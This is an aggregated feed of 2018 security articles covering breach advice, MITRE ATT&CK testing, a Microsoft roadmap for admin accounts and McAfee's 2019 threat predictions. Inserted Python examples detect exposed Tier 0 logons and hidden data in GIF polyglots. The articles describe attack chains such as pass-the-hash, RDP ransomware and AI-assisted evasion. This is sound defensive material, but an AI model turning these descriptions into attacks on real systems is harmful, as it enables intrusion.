Penetration testing is becoming increasingly popular as organizations are beginning to embrace the need for stronger cybersecurity. But there are still too many businesses that don’t fully understand the benefits of regular security testing. Pen testing is vital for any kind of organization with an IT system or website. A recent survey of penetration testers […]… Read More

The post What Type of Vulnerabilities Does a Penetration Test Look For? appeared first on The State of Security.

First Smartphone: Are You Putting Cyberbullies Under the Tree This Year?

There’s pressure — lots of pressure. And not the typical I-want-a-bike or a doll-that-poops kind of pressure your kids may have foisted upon you just a few Christmases ago. No, this is the big leagues. Your child wants his or her first smartphone to show up under the tree this year. Is your son or daughter ready? Bigger question: Are you ready?

A first smartphone is a big step in a family that can’t be unstepped. Because it’s not about what a phone used to be about, which is dialing the number of a person you need to speak with. Today, giving your child a cell phone unlocks a hidden wardrobe door that leads to a whole new Narnia-like world abounding in both hills of goodness and valleys of emotional punches.

A first cell phone isn’t a casual purchase. Besides the financial investment (these things aren’t cheap), there’s a family dynamic that will likely change and a peer-to-peer dynamic that will go through its tumultuous metamorphosis.

Here are a few things to consider and talk through with your family before making your final decision to purchase that first smartphone.

Family talking points

  1. Maturity milestones. A phone is a small computer your child will carry in his or her pocket from this point forward. Has your child demonstrated maturity in other areas? Can he or she stay home alone responsibly for short periods? Does your child take care of his or her possessions, complete chores, and homework on time and without you nagging? Does your child earn/save/spend his or her allowance in a mature way? Does your child show empathy for others or deal with conflict well? These milestones are worth examining. If you feel uneasy about your child’s overall maturity, you might consider setting some goals to move your child toward cell phone ownership sometime in the future.
  2. The cyberbully factor. We know you’d never willingly invite a cyberbully into your home and especially wouldn’t put one under the tree for your child to discover on Christmas morning. However, that’s the reality of what phone ownership will bring sooner or later. Is your child emotionally strong enough to handle mean comments, feeling excluded, or being criticized or joked with in public? How does your child handle peer conflict without a phone? The emotional impact of owning a phone is not something you will see advertised, but it’s a huge factor to consider.
  3. Peer pressure. Digital peer pressure is a real thing. There’s pressure to dress a certain way, post pictures a certain way, and post activities online to gain status points in certain social circles. The selfie craze, online dares, digital trends and hashtags, and other pressures are all part of the smartphone equation.
  4. Harmful content. There’s a lot of great content online — educational, entertaining, and fun — but there’s a lot of content that is harmful to kids such as pornography, hateful ideology, and cruelty. Can your child resist the temptation to seek out or look at concerning content? Can your child discern ideas? Are you as a parent willing to take the extra steps to filter inappropriate content?
  5. Privacy issues. With a new phone comes great responsibility toward guarding one's personal information. Do you have the time to communicate, teach, and monitor your child's online footprint? Getting kids off to a strong start will require much time and care up front until your son or daughter has a grasp on the value of personal data.
  6. Social media. Social media owns vast real estate on a child’s phone and includes everything from gaming, to social networks, to various “communities” attached to apps. Anywhere your child can create a username and profile and connect with others, opens him or her up to risks of cyberbullying, strangers, and scams. Discuss new apps and establish ground rules and phone usage boundaries that make sense for your family. The most important part of setting rules is to enforce the rules.
  7. Screentime ground rules. With a first smartphone comes the risk of too much screen time. Addiction to online gaming, social media, and phones, in general, have become a public health concern. Put family rules in place that set time limits and phone free zones. Keep communication open and consistent to keep your kids following healthy screen time habits.

The post First Smartphone: Are You Putting Cyberbullies Under the Tree This Year? appeared first on McAfee Blogs.

Security Affairs: MITRE evaluates Enterprise security products using the ATT&CK Framework

The MITRE Corporation's ATT&CK framework has been used to evaluate the effectiveness of enterprise security products from several vendors.

In April, MITRE announced a new service based on its ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework to evaluate products on their ability to detect advanced persistent threats.

The MITRE ATT&CK evaluation service assesses endpoint detection and response products for their ability to detect advanced threats.

"There are a lot of products on the market that try to detect adversary behavior, and we're trying to figure out what they can do," says Frank Duff, principal cybersecurity engineer at MITRE.

Duff explained that MITRE adopts a transparent methodology and knowledge base that makes it easy to interpret the results obtained with its service.

ATT&CK framework

In the first round, MITRE evaluated products against an emulation of the APT3/Gothic Panda cyber espionage group.

APT3 (aka UPS Team, Gothic Panda, Buckeye and TG-0110) is a China-linked APT group that operates under the control of China's Ministry of State Security. The cyber espionage group is responsible for several campaigns, including Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap. As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.

The first tests conducted by MITRE evaluated the ability of products from Carbon Black, CrowdStrike, CounterTack, Endgame, Microsoft, RSA and SentinelOne to detect APT3's techniques.

The tests focus on a product's ability to detect the malicious activities that threat actors typically carry out once they have compromised a system in an organization. It is important to highlight that the MITRE ATT&CK evaluation does not assign scores to each product; it is not designed as a comparison tool.

“Direct comparison between vendor capabilities is complicated, and we encourage anyone using our results to consider other factors we didn’t evaluate. Our evaluations are narrowly focused on the technical ability to detect adversary behavior.” Duff wrote in a blog post.

“There are other factors we are not accounting for in our evaluations that should be considered by decision makers as they decide which tool best fits their needs,” Duff said. “You should consider factors such as cost of ownership, sophistication of your Security Operations Center, environmental noise, integration with other tools, user interface, security policies, and other factors. One product may not fit every need, and products can address different needs in different ways.”

MITRE worked with the vendors during the evaluations and shared the results with them.

“We approach the evaluations with a collaborative, “purple-teaming” mindset, and we think this allows us to better articulate what a vendor’s capability can do than if we left them out of the process. During the evaluation, MITRE and the vendor are in open communication.” 

“The vendor then shows us their detections and describes their process so that we can verify the detection. Since our goal is to capture different detection methods, we may even suggest to the vendor how their capability might have detected the behavior.”

The initial evaluations included the above vendors, which signed up before the June 30, 2018 cohort deadline.

Pierluigi Paganini

(Security Affairs – Mitre, ATT&CK Framework)

The post MITRE evaluates Enterprise security products using the ATT&CK Framework appeared first on Security Affairs.

Affected by a Data Breach? 6 Security Steps You Should Take

It’s common for people to share their personal information with companies for multiple reasons. Whether you’re checking into a hotel room, using a credit card to make a purchase at your favorite store, or collecting rewards points at your local coffee shop, companies have more access to your data than you may think. While this can help you build relationships with your favorite vendors, what happens if their security is compromised?

A high-profile hotel and another popular consumer brand’s perks program recently experienced data breaches that exposed users’ personal information. If you think you were affected by one of these breaches, there are multiple steps you can take to help protect yourself from the potential side effects.

Check out the following tips if you think you may have been affected by a data breach, or just want to take extra precautions:

  • Change your password. Most people will rotate between the same three passwords for all of their personal accounts. While this makes it easier to remember your credentials, it also makes it easier for hackers to access more than one of your accounts. Try using a unique password for every one of your accounts or employ a password manager.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you monitor your accounts, alert you to any suspicious activity, and help you recover losses if something goes wrong.
  • Update your privacy settings. Be careful with how much of your personal information you share online. Make sure your social media accounts and mobile apps are set to private and use multi-factor authentication to keep your accounts from being taken over even if a password leaks.
  • Be vigilant about checking your accounts. If you suspect that your personal data has been compromised, frequently check your bank account and credit activity. Many banks and credit card companies offer free alerts that notify you via email or text messages when new purchases are made, if there’s an unusual charge, or when your account balance drops to a certain level. This will help you stop fraudulent activity in its tracks.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Affected by a Data Breach? 6 Security Steps You Should Take appeared first on McAfee Blogs.

Industry reactions to the enormous Marriott data breach

On September 8, 2018, Marriott received an alert from an internal security tool regarding an attempt to access the Starwood guest reservation database in the United States. Marriott engaged security experts to help determine what had occurred, and learned during the investigation that there had been unauthorized access to the Starwood network since 2014. The company recently discovered that an unauthorized party had copied and encrypted information and had taken steps toward removing it. On November 19, … More

The post Industry reactions to the enormous Marriott data breach appeared first on Help Net Security.

The fundamentals of network security and cybersecurity hygiene

Infrastructure and network security

The two fundamental building blocks to ensuring that your data is secure are physical infrastructure and network security. Understanding and protecting your information from threats and human error require meticulously layered security protocols.

Physical infrastructure

Last year, British Airways canceled over 400 flights and stranded 75,000 passengers because of an IT outage caused by an engineer who disconnected a power supply at a data center near London's Heathrow airport. When it … More

The post The fundamentals of network security and cybersecurity hygiene appeared first on Help Net Security.

Secure your privileged administrative accounts with a phased roadmap

In my role, I often meet with CISOs and security architects who are updating their security strategy to meet the challenges of continuously evolving attacker techniques and cloud platforms. A frequent topic is prioritizing security for their highest value assets, both the assets that have the most business value today and the initiatives that the organization is banking on for the future. This typically includes intellectual property, customer data, key new digital initiatives, and other data that, if leaked, would do the greatest reputational and financial damage. Once we've identified the highest value assets, the conversation inevitably turns to all the privileged accounts that have administrative rights over them. Most of our customers recognize that you can no longer protect the enterprise just by securing the network edge; the cloud and mobile devices have permanently changed that. Identities represent the critically important new security perimeter in a dual perimeter strategy while legacy architectures are slowly phased out.

Regardless of perimeter and architecture, there are few things more important to a secure posture than protecting admins. This is because a compromised admin account would cause a much greater impact on the organization than a compromised non-privileged user account.

If you are working on initiatives to secure your privileged accounts (and I hope you are), this post is designed to help. I've shared some of the principles and tools that Microsoft has used to guide and enhance our own security posture, including some prescriptive roadmaps to help you plan your own initiatives.

Protect the privileged access lifecycle

Once you start cataloging all the high-value assets and who can impact them, it quickly becomes clear that we aren't just talking about traditional IT admins when we talk about privileged accounts. There are people who manage social media accounts rich with customer data, cloud services admins, and those that manage directories or financial data. All of these user accounts need to be secured (though most organizations start with IT admins first and then progress to others, prioritized based on risk or the ability to secure the account quickly).

Protecting the privileged access lifecycle is also more than just vaulting the credentials. Organizations need to take a complete and thoughtful approach to isolate the organization's systems from risks. It requires changes to:

  • Processes, habits, administrative practices, and knowledge management.
  • Technical components such as host defenses, account protections, and identity management.

Principles of securing privileged access

Securing all aspects of the privileged lifecycle really comes down to the following principles:

  • Strengthen authentication:
    • Move beyond passwords, which are too often weak or easily guessed, to passwordless or multi-factor authentication (MFA) that combines at least two factors, such as a PIN, a biometric, or a code generated by a device.
    • Make sure you detect and remediate leaked credentials.
  • Reduce the attack surface:
    • Remove legacy/insecure protocols.
    • Remove duplicate/weak passwords.
    • Reduce dependencies.
  • Increase monitoring and detection.
  • Automate threat response.
  • Ensure usability for administrators.

To illustrate the importance we place on privileged access controls, I've included a diagram that shows how Microsoft protects itself. You'll see we have instituted traditional defenses for securing the network, as well as made extensive investments into development security, continuous monitoring, and processes to ensure we are looking at our systems with an attacker's eye. You can also see how we place a very high priority on security for privileged users, with extensive training, rigorous processes, separate workstations, as well as strong authentication.

Prioritize quick, high-value changes first using our roadmap

To help our customers get the most protection for their investment of time/resources, we have created prescriptive roadmaps to kickstart your planning. These will help you plan out your initiatives in phases, so you can knock out quick wins first and then incrementally increase your security over time.

Check out the Azure Active Directory (Azure AD) roadmap to plan out protections for the administration of this critical system. We also have an on-premises roadmap focused on Active Directory admins, which I've included below. Since many organizations run hybrid networks, we will soon merge these two roadmaps.

On-premises privileged identity roadmap

There are three stages to secure privileged access for an on-premises AD.

Stage 1 (30 days)

Stage 1 of the roadmap is focused on quickly mitigating the most frequently used attack techniques of credential theft and abuse.

1. Separate accounts: Give admins a dedicated account for administration, separate from the account they use for email and web browsing. This is the first step to keep internet-borne attacks (phishing, drive-by web content) from landing on an account that holds administrative privileges.

2 and 3. Unique passwords for workstations and servers: This is a critical containment step. When every machine shares the same local administrator password, an adversary who steals that account's password hash from one computer can replay it (pass-the-hash) to log on to every other computer; a unique password per machine limits the theft to the machine it came from.

4. Privileged access workstations (PAW) stage 1: This reduces internet risks by ensuring that the workstations admins use every day are protected at a very high level.

5. Identity attack detection: Ensures that security operations have visibility into well-known attack techniques on admins.

Stage 2 (90 days)

These capabilities build on the mitigations from the 30-day plan and provide a broader spectrum of mitigations, including increased visibility and control of administrative rights.

1. Require Windows Hello for Business: Replace hard-to-remember and easily compromised passwords with strong, easy-to-use authentication for your admins.

2. PAW stage 2: Requiring separate admin workstations significantly increases the security of the accounts your admins use to do their work. This makes it extremely difficult for adversaries to get access to your admins and is modeled on the systems we use to protect Azure and other sensitive systems at Microsoft (described earlier).

3. Just in time privileges: Lowers the exposure of privileges and increases visibility into privilege use by providing them to admins as they need it. This same principle is applied rigorously to admins of our cloud.

4. Enable Credential Guard on Windows 10 workstations: This uses virtualization-based security to isolate the NTLM password hashes and Kerberos tickets held on all Windows 10 user workstations, so that an attacker who compromises a workstation cannot simply dump those secrets and reuse them to reach the admins.

5. Leaked credentials 1: This enables you to detect the risk of a leaked password by synchronizing password hashes to Azure AD, where they can be compared against known leaked credentials.

6. Lateral movement vulnerability detection: Discover which sensitive accounts in your network are exposed because of their connection to non-sensitive accounts, groups, and machines.
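Several of the roadmap items above (separate accounts, privileged access workstations, identity attack detection and lateral movement exposure) reduce to one observable: a Tier 0 account should only ever authenticate from a Tier 0 administrative host. The following is an added example, not taken from the Microsoft post or any Microsoft product, showing that check run over successful-logon records shaped like Windows Security event ID 4624. The group membership, host names, account names and the tier boundaries are constructed assumptions for the example; in practice they would come from the directory and the event log.

```python
"""Detect Tier 0 accounts authenticating outside the Tier 0 boundary.

Added example, not taken from the Microsoft post or any Microsoft product.
The records mimic the fields of Windows Security event ID 4624 (successful
logon) but are constructed, as are the group memberships, hosts and tiering.
"""

# Assumed tiering: these groups control the directory, and these hosts are
# the only places their members should ever type a password or use a ticket.
TIER0_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins"}
TIER0_HOSTS = {"DC01", "DC02", "PAW-ADM01"}

# Logon types that leave reusable credentials (hash, ticket or cleartext) on
# the target host: interactive (2), batch (4), service (5), unlock (7),
# network cleartext (8), remote interactive/RDP (10), cached interactive (11).
# A plain network logon (3) does not, so it is deliberately not listed.
CREDENTIAL_EXPOSING_LOGON_TYPES = {2, 4, 5, 7, 8, 10, 11}

# Constructed directory group membership (username -> groups).
GROUP_MEMBERSHIP = {
    "jdoe-adm": {"Domain Admins"},
    "jdoe": {"Domain Users"},
    "svc-backup": {"Backup Operators"},
}

# Constructed 4624/4625 records trimmed to the fields the check needs.
EVENTS = [
    {"EventID": 4624, "TargetDomainName": "CORP", "TargetUserName": "jdoe-adm", "LogonType": 2, "Computer": "DC01"},
    {"EventID": 4624, "TargetDomainName": "CORP", "TargetUserName": "jdoe-adm", "LogonType": 10, "Computer": "WS-1047"},
    {"EventID": 4624, "TargetDomainName": "CORP", "TargetUserName": "jdoe-adm", "LogonType": 3, "Computer": "FILE01"},
    {"EventID": 4624, "TargetDomainName": "CORP", "TargetUserName": "jdoe", "LogonType": 2, "Computer": "WS-1047"},
    {"EventID": 4624, "TargetDomainName": "CORP", "TargetUserName": "svc-backup", "LogonType": 5, "Computer": "FILE01"},
    {"EventID": 4625, "TargetDomainName": "CORP", "TargetUserName": "jdoe-adm", "LogonType": 10, "Computer": "WS-2210"},
]


def tier0_accounts(membership):
    """Return the usernames that hold membership in any Tier 0 group."""
    return {user for user, groups in membership.items() if groups & TIER0_GROUPS}


def find_exposures(events, membership):
    """One finding per successful logon in which a Tier 0 account left reusable
    credentials on a host outside the Tier 0 boundary."""
    privileged = tier0_accounts(membership)
    findings = []
    for ev in events:
        if ev.get("EventID") != 4624:
            continue  # failed logons (4625) are a brute-force signal, not exposure
        user, host = ev["TargetUserName"], ev["Computer"]
        if user not in privileged or host in TIER0_HOSTS:
            continue
        if ev["LogonType"] not in CREDENTIAL_EXPOSING_LOGON_TYPES:
            continue  # e.g. a network logon leaves nothing on the host to steal
        findings.append({
            "account": f"{ev['TargetDomainName']}\\{user}",
            "host": host,
            "logon_type": ev["LogonType"],
            "reason": "Tier 0 credential exposed on a non-Tier 0 host",
        })
    return findings


def exposed_hosts_by_account(findings):
    """Group findings so each privileged account lists the hosts from which an
    attacker could harvest its credentials (the lateral-movement exposure view)."""
    by_account = {}
    for f in findings:
        by_account.setdefault(f["account"], set()).add(f["host"])
    return by_account


if __name__ == "__main__":
    for f in find_exposures(EVENTS, GROUP_MEMBERSHIP):
        print(f"{f['account']} logon type {f['logon_type']} on {f['host']}: {f['reason']}")
```

On the constructed input only the RDP logon of jdoe-adm to the workstation WS-1047 is reported: the same account's logon to DC01 is inside the boundary, and its network logon to FILE01 leaves no reusable secret on that server. The same rule is what makes separate admin accounts and PAWs measurable: once both are in place, the finding list for Tier 0 accounts should be empty.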

Stage 3: Proactively secure posture

These capabilities build on the mitigations from previous phases and move your defenses into a proactive posture. While there will never be perfect security, this represents the strongest protections against privilege attacks currently known and available today.

1. Review role-based access control: Protect identity and management systems using a set of buffer zones between full control of the environment (Tier 0) and the high-risk workstation assets that attackers frequently compromise.

2. PAW stage 3: Expands your protection by separating internet risks (phishing attacks, web browsing) from all administrative privileges, not just AD admins.

3. Lower the attack surface of the domain and domain controllers: This hardens these sensitive assets to make it difficult for attackers to compromise them with classic attacks such as exploiting unpatched vulnerabilities and configuration weaknesses.

4. Leaked credentials 2: This steps up the protection of admin accounts against leaked credentials by forcing a reset of passwords using conditional access and self-service password reset (versus requiring someone to review the leaked credentials reports and manually take action).

Securing your administrative accounts will reduce your risk significantly. Stay tuned for the hybrid roadmap, which will be completed in early 2019.

The post Secure your privileged administrative accounts with a phased roadmap appeared first on Microsoft Secure.

Supreme Court of Pennsylvania Ruling on Common Law Duty to Protect Electronic Employee Data

On November 21, 2018, the Supreme Court of Pennsylvania ruled that a putative class action filed against UPMC (d/b/a The University of Pittsburgh Medical Center) should not have been dismissed.

The case arose from a data breach in which criminals accessed UPMC’s computer systems and stole the personal and financial information of 62,000 current and former UPMC employees. This information included names, birth dates, Social Security numbers, addresses, tax forms and bank account data, all of which the employees were required to provide as a condition of employment. The plaintiffs alleged that UPMC was negligent in the collection and storage of this information, and breached an implied contract in connection with the event. The trial court dismissed the case, which the intermediate appellate court affirmed.

Pennsylvania’s highest court, however, disagreed. The court held that: (1) an employer has a duty under Pennsylvania common law to use reasonable care to safeguard its employees’ sensitive personal information that it stores on Internet-accessible computer systems; and (2) Pennsylvania’s economic loss doctrine did not bar the plaintiffs’ negligence claim.

The court explained that it was not creating a new, affirmative duty. Rather, “the case is one involving application of an existing duty to a novel factual scenario.” In other words, the duty was presumed due to UPMC’s alleged risk-causing conduct. Indeed, the court stressed that due to the early procedural posture of the case, it was required to accept as true the plaintiffs’ allegations that UPMC’s conduct created the risk of the data breach. The presence of a third party’s criminal conduct also was not a superseding cause that cut off UPMC’s liability because UPMC’s alleged conduct created a situation where UPMC knew, or should have known, that a third party might try to compromise its network.

The court next found that the economic loss doctrine, as applied in Pennsylvania, did not preclude all negligence claims seeking purely “economic damages” (i.e., monetary damages that do not involve personal injury or property damage). After discussing prior Pennsylvania economic loss doctrine cases, the court concluded that the common law duty it had recognized existed independently from any contractual obligation between the parties, thus precluding application of the economic loss doctrine. As the court noted, this approach to the economic loss doctrine is not taken by all states.

McAfee Labs 2019 Threats Predictions Report

These predictions were written by Eoin Carroll, Taylor Dunton, John Fokker, German Lancioni, Lee Munson, Yukihiro Okutomi, Thomas Roccia, Raj Samani, Sekhar Sarukkai, Dan Sommer, and Carl Woodward.

As 2018 draws to a close, we should perhaps be grateful that the year has not been entirely dominated by ransomware, although the rise of the GandCrab and SamSam variants shows that the threat remains active. Our predictions for 2019 move away from simply providing an assessment on the rise or fall of a particular threat, and instead focus on current rumblings we see in the cybercriminal underground that we expect to grow into trends and subsequently threats in the wild.

We have witnessed greater collaboration among cybercriminals exploiting the underground market, which has allowed them to develop efficiencies in their products. Cybercriminals have been partnering in this way for years; in 2019 this market economy will only expand. The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before.

Social media has been a part of our lives for more than a decade. Recently, nation-states have infamously used social media platforms to spread misinformation. In 2019, we expect criminals to begin leveraging those tactics for their own gain. Equally, the continued growth of the Internet of Things in the home will inspire criminals to target those devices for monetary gain.

One thing is certain: Our dependency on technology has become ubiquitous. Consider the breaches of identity platforms, with reports of 50 million users being affected. It is no longer the case that a breach is limited to that platform. Everything is connected, and you are only as strong as your weakest link. In the future, we face the question of which of our weakest links will be compromised.

—Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research

Twitter @Raj_Samani


Predictions

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Artificial Intelligence the Future of Evasion Techniques

Synergistic Threats Will Multiply, Requiring Combined Responses

Misinformation, Extortion Attempts to Challenge Organizations’ Brands

Data Exfiltration Attacks to Target the Cloud

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Cybercriminal Underground to Consolidate, Create More Partnerships to Boost Threats

Hidden hacker forums and chat groups serve as a market for cybercriminals, who can buy malware, exploits, botnets, and other shady services. With these off-the-shelf products, criminals of varying experience and sophistication can easily launch attacks. In 2019, we predict the underground will consolidate, creating fewer but stronger malware-as-a-service families that will actively work together. These increasingly powerful brands will drive more sophisticated cryptocurrency mining, rapid exploitation of new vulnerabilities, and increases in mobile malware and stolen credit cards and credentials.

We expect more affiliates to join the biggest families, due to the ease of operation and strategic alliances with other essential top-level services, including exploit kits, crypter services, Bitcoin mixers, and counter-antimalware services. Two years ago, we saw many of the largest ransomware families, for example, employ affiliate structures. We still see numerous types of ransomware pop up, but only a few survive because most cannot attract enough business to compete with the strong brands, which offer higher infection rates as well as operational and financial security. At the moment the largest families actively advertise their goods; business is flourishing because they are strong brands (see GandCrab) allied with other top-level services, such as money laundering or making malware undetectable.

Underground businesses function successfully because they are part of a trust-based system. This may not be a case of “honor among thieves,” yet criminals appear to feel safe, trusting they cannot be touched in the inner circle of their forums. We have seen this trust in the past, for example, with the popular credit card shops in the first decade of the century, which were a leading source of cybercrime until major police action broke the trust model.

As endpoint detection grows stronger, exposed remote desktop protocol (RDP) services offer another path for cybercriminals. In 2019 we predict malware, specifically ransomware, will increasingly use RDP as an entry point for an infection. Currently, most underground shops advertise RDP access for purposes other than ransomware, typically using it as a stepping stone to gain access to Amazon accounts or as a proxy to steal credit cards. Targeted ransomware groups and ransomware-as-a-service (RaaS) models will take advantage of RDP, and we have seen highly successful under-the-radar schemes use this tactic. Attackers find a system with weak RDP credentials or an exposed RDP service, deploy ransomware on it, and propagate through the network either by living off the land or with worm functionality built on exploits such as EternalBlue. There is evidence that the author of GandCrab is already working on an RDP option.

We also expect malware related to cryptocurrency mining will become more sophisticated, selecting which currency to mine on a victim’s machine based on the processing hardware (WebCobra) and the value of a specific currency at a given time.

Next year, we predict the window between a vulnerability's disclosure and its weaponization will grow even shorter. We have noticed a trend of cybercriminals becoming more agile in their development process. They gather data on flaws from online forums and the Common Vulnerabilities and Exposures database to add to their malware. We predict that criminals will sometimes take a day or only hours to implement attacks against the latest weaknesses in software and hardware.

We expect to see an increase in underground discussions on mobile malware, mostly focused on Android, regarding botnets, banking fraud, ransomware, and bypassing two-factor authentication security. The value of exploiting the mobile platform is currently underestimated as phones offer a lot to cybercriminals given the amount of access they have to sensitive information such as bank accounts.

Credit card fraud and the demand for stolen credit card details will continue, with an increased focus on online skimming operations that target third-party payment platforms on large e-commerce sites. From these sites, criminals can silently steal thousands of fresh credit card details at a time. Furthermore, social media is being used to recruit unwitting users, who might not know they are working for criminals when they reship goods or provide financial services.

We predict an increase in the market for stolen credentials—fueled by recent large data breaches and by bad password habits of users. The breaches lead, for example, to the sale of voter records and email-account hacking. These attacks occur daily.

Artificial Intelligence the Future of Evasion Techniques

To increase their chances of success, attackers have long employed evasion techniques to bypass security measures and avoid detection and analysis. Packers, crypters, and other tools are common components of attackers’ arsenals. In fact, an entire underground economy has emerged, offering products and dedicated services to aid criminal activities. We predict in 2019, due to the ease with which criminals can now outsource key components of their attacks, evasion techniques will become more agile due to the application of artificial intelligence. Think the counter-AV industry is pervasive now? This is just the beginning.

In 2018 we saw new process-injection techniques such as "process doppelgänging" with the SynAck ransomware, and PROPagate injection delivered by the RIG exploit kit. By adding technologies such as artificial intelligence, evasion techniques will be able to further circumvent protections.

Different evasions for different malware

In 2018, we observed the emergence of new threats such as cryptocurrency miners, which hijack the resources of infected machines. With each threat comes inventive evasion techniques:

  • Cryptocurrency mining: Miners implement a number of evasion techniques. One example is WaterMiner, which simply stops its mining process when the victim runs the Task Manager or an antimalware scan.
  • Exploit kits: Popular evasion techniques include process injection or the manipulation of memory space and adding arbitrary code. In-memory injection is a popular infection vector for avoiding detection during delivery.
  • Botnets: Code obfuscation or anti-disassembly techniques are often used by large botnets that infect thousands of victims. In May 2018, AdvisorsBot was discovered using junk code, fake conditional instructions, XOR encryption, and even API hashing. Because bots tend to spread widely, the authors implemented many evasion techniques to slow reverse engineering. They also used obfuscation mechanisms for communications between the bots and control servers. Criminals use botnets for activities such as DDoS for hire, proxies, spam, or other malware delivery. Using evasion techniques is critical for criminals to avoid or delay botnet takedowns.
  • Advanced persistent threats: Stolen code-signing certificates bought on the cybercriminal underground are often used in targeted attacks to bypass antimalware detection. Attackers also use low-level malware such as rootkits or firmware-based threats. For example, in 2018 ESET discovered LoJax, the first UEFI rootkit found in the wild. Security researchers have also seen destructive features used as anti-forensic techniques: The OlympicDestroyer malware targeted the Olympic Games organization and erased event logs and backups to hinder investigation.

Artificial intelligence the next weapon

In recent years, we have seen malware using evasion techniques to bypass machine learning engines. For example, in 2017 the Cerber ransomware dropped legitimate files on systems to trick the engine that classifies files. In 2018, PyLocky ransomware used Inno Setup to package the malware and avoid machine learning detection.

Clearly, bypassing artificial intelligence engines is already on the criminal to-do list; however, criminals can also implement artificial intelligence in their malicious software. We expect evasion techniques to begin leveraging artificial intelligence to automate target selection, and to assess an infected environment before deploying later stages so that the malware avoids detection.

Such implementation is game changing in the threat landscape. We predict it will soon be found in the wild.

Synergistic Threats Will Multiply, Requiring Combined Responses

This year we have seen cyber threats adapt and pivot faster than ever. We have seen ransomware evolving to be more effective or to operate as a smoke screen. We have seen cryptojacking soar, as it provides a better, and safer, return on investment than ransomware. We can still see phishing going strong and finding new vulnerabilities to exploit. We also noticed fileless and "living off the land" threats are more slippery and evasive than ever, and we have even seen the incubation of steganography malware in the Pyeongchang Olympics campaign. In 2019, we predict attackers will more frequently combine these tactics to create multifaceted, or synergistic, threats.

What could be worse?

Attacks are usually centered on the use of one threat. Bad actors concentrate their efforts on iterating and evolving one threat at a time for effectiveness and evasion. When an attack is successful, it is classified as ransomware, cryptojacking, data exfiltration, etc., and defenses are put in place. At this point, the attack’s success rate is significantly reduced. However, if a sophisticated attack involves not one but five top-notch threats synergistically working together, the defense panorama could become very blurry. The challenge arises when an attempt is made to identify and mitigate the attack. Because the ultimate attack goals are unknown, one might get lost in the details of each threat as it plays a role in the chain.

One of the reasons synergistic threats are becoming a reality is that bad actors are improving their skills by developing foundations, kits, and reusable threat components. As attackers organize their efforts into a black-market business model, they can focus on adding value to previous building blocks. This strategy allows them to orchestrate multiple threats instead of just one to reach their goals.

An example is worth a thousand words

Imagine an attack that starts with a phishing threat, not a typical campaign using Word documents, but a novel technique. This phishing email contains a video attachment. When you open the video, your video player does not play it and instead prompts you to update the codec. Once you run the update, a steganographic polyglot file that looks like a simple GIF is deployed on your system. Because it is a polyglot (a file that conforms to more than one format at the same time), an image viewer sees a harmless GIF while another interpreter sees code: the file schedules a task that fetches a fileless script hosted on a compromised system. That script, running in memory, evaluates your system and decides to run either ransomware or a cryptocurrency miner. That is a dangerous synergistic threat in action.
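A polyglot of the kind described above works because a GIF decoder stops reading at the trailer byte while a second interpreter keeps going, or because the second format's content is tucked into a GIF comment extension the decoder ignores. The following added example, which is not part of the McAfee report, walks the real GIF block structure to find where the image legitimately ends and reports anything that follows it, plus the contents of any comment extensions. The 1x1 GIF and the text appended to it are constructed so the check runs offline; the payload is an inert marker, not real code.

```python
"""Find data hidden in a GIF polyglot by walking the real GIF block structure.

Added example, not part of the McAfee report. The 1x1 GIF, the comment and
the text appended after the trailer are all constructed.
"""

GIF_HEADERS = (b"GIF87a", b"GIF89a")
TRAILER, IMAGE_DESCRIPTOR, EXTENSION, COMMENT_LABEL = 0x3B, 0x2C, 0x21, 0xFE


def _color_table_size(packed):
    """Byte length of a color table if its flag bit (0x80) is set in `packed`:
    3 bytes per entry, 2**(N+1) entries where N is the low three bits."""
    return 3 * (2 << (packed & 0x07)) if packed & 0x80 else 0


def _read_subblocks(data, pos):
    """Concatenate a chain of GIF data sub-blocks; return (payload, pos after 0x00)."""
    out = bytearray()
    while True:
        if pos >= len(data):
            raise ValueError("truncated sub-block chain")
        n = data[pos]
        pos += 1
        if n == 0:
            return bytes(out), pos
        out += data[pos:pos + n]
        pos += n


def analyze_gif(data):
    """Return where the GIF structurally ends, the bytes after it, and comment payloads."""
    if data[:6] not in GIF_HEADERS:
        raise ValueError("not a GIF")
    pos = 6
    pos += 7 + _color_table_size(data[pos + 4])  # logical screen descriptor + global table
    comments = []
    while pos < len(data):
        block = data[pos]
        pos += 1
        if block == TRAILER:
            return {"image_end": pos, "trailing": data[pos:], "comments": comments}
        if block == IMAGE_DESCRIPTOR:
            pos += 9 + _color_table_size(data[pos + 8])  # descriptor + local table
            pos += 1  # LZW minimum code size
            _, pos = _read_subblocks(data, pos)
        elif block == EXTENSION:
            label = data[pos]
            pos += 1
            payload, pos = _read_subblocks(data, pos)
            if label == COMMENT_LABEL:
                comments.append(payload)
        else:
            raise ValueError(f"unexpected block 0x{block:02x} at offset {pos - 1}")
    raise ValueError("no trailer: file truncated")


def is_suspicious(report, max_comment_len=256):
    """Heuristic: bytes after the trailer, or an oversized comment, warrant a look."""
    return bool(report["trailing"]) or any(len(c) > max_comment_len for c in report["comments"])


# Constructed minimal GIF89a: 1x1 canvas, 2-color global table, one image block.
_HEAD = b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00" + b"\x00\x00\x00\xff\xff\xff"
_IMAGE = b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00" + b"\x02\x02\x44\x01\x00"
CLEAN_GIF = _HEAD + _IMAGE + b"\x3b"
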